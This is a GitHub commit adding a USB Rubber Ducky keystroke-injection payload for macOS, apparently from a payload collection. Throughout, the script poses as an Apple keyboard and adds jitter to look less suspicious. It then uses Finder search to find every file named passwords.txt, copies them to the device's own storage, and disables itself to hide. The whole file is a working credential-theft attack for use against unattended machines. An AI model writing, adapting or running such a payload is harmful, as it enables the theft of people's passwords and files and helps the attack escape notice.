Create payload.txt
Kile
GitHub
parent
83b78578af
commit
470bbbf59d
|
|
@ -0,0 +1,89 @@
|
||||||
|
REM TITLE Exfiltrate specific file macOS
|
||||||
|
REM AUTHOR Kile
|
||||||
|
REM DESCRIPTION Opens the terminal, then uses search to find all files matching filename and copies them to the DUCKY
|
||||||
|
|
||||||
|
REM NOTE This is not unlikely to fail depending on the speed of search or if a large amount of files meet the criteria. Adjust DELAYs to your needs
|
||||||
|
|
||||||
|
ATTACKMODE STORAGE HID VID_05AC PID_021E
|
||||||
|
DELAY 2000
|
||||||
|
|
||||||
|
REM the filename for the payload to look for
|
||||||
|
DEFINE #target passwords.txt
|
||||||
|
|
||||||
|
REM Given that it uses the GUI it is a good idea to enable jitter to be less suspicious
|
||||||
|
$_JITTER_ENABLED = TRUE
|
||||||
|
|
||||||
|
REM This function tabs the amount of times it takes from a finder search to go onto the first file result (4)
|
||||||
|
FUNCTION DO_TABS()
|
||||||
|
VAR $COUNTER = 0
|
||||||
|
WHILE ($COUNTER < 4)
|
||||||
|
TAB
|
||||||
|
DELAY 100
|
||||||
|
$COUNTER = ($COUNTER + 1)
|
||||||
|
END_WHILE
|
||||||
|
END_FUNCTION
|
||||||
|
|
||||||
|
REM Open finder
|
||||||
|
COMMAND SPACE
|
||||||
|
STRINGLN finder
|
||||||
|
DELAY 500
|
||||||
|
REM Command n spawns a new window. This makes sure there is only one finder tab (for tabbing to the files later)
|
||||||
|
COMMAND n
|
||||||
|
|
||||||
|
REM Open search bar in finder
|
||||||
|
COMMAND f
|
||||||
|
DELAY 200
|
||||||
|
REM type target filename
|
||||||
|
STRING #target
|
||||||
|
DELAY 200
|
||||||
|
REM This specifies that the passwords.txt has to be a filename and not be in any file
|
||||||
|
DOWN
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
|
||||||
|
REM Give a bit to find all files
|
||||||
|
DELAY 500
|
||||||
|
REM now 4 tabs to get to the first file result
|
||||||
|
DO_TABS()
|
||||||
|
|
||||||
|
REM select all files that have the specified target in their name
|
||||||
|
COMMAND a
|
||||||
|
REM Copy the files
|
||||||
|
COMMAND c
|
||||||
|
DELAY 500
|
||||||
|
REM Go back to search window
|
||||||
|
COMMAND f
|
||||||
|
DELAY 200
|
||||||
|
REM Delete previous search
|
||||||
|
DEL
|
||||||
|
|
||||||
|
REM Search for DUCKY USB
|
||||||
|
STRING DUCKY
|
||||||
|
DELAY 200
|
||||||
|
DOWN
|
||||||
|
ENTER
|
||||||
|
REM Specifies that the "DUCKY" has to be an external USB drive
|
||||||
|
STRING Volume
|
||||||
|
DELAY 200
|
||||||
|
DOWN
|
||||||
|
DOWN
|
||||||
|
DOWN
|
||||||
|
ENTER
|
||||||
|
ENTER
|
||||||
|
REM This can take annoyingly long to show up which is why the delay is so big
|
||||||
|
DELAY 6000
|
||||||
|
|
||||||
|
REM Go to first result
|
||||||
|
DO_TABS()
|
||||||
|
|
||||||
|
REM Open the drive
|
||||||
|
COMMAND o
|
||||||
|
DELAY 1000
|
||||||
|
REM This takes a few seconds
|
||||||
|
|
||||||
|
REM Paste the copied files. As this may take a few seconds given on how many results there were there is a long delay
|
||||||
|
COMMAND v
|
||||||
|
DELAY 7000
|
||||||
|
|
||||||
|
REM Hide
|
||||||
|
ATTACKMODE OFF
|
||||||
Loading…
Reference in New Issue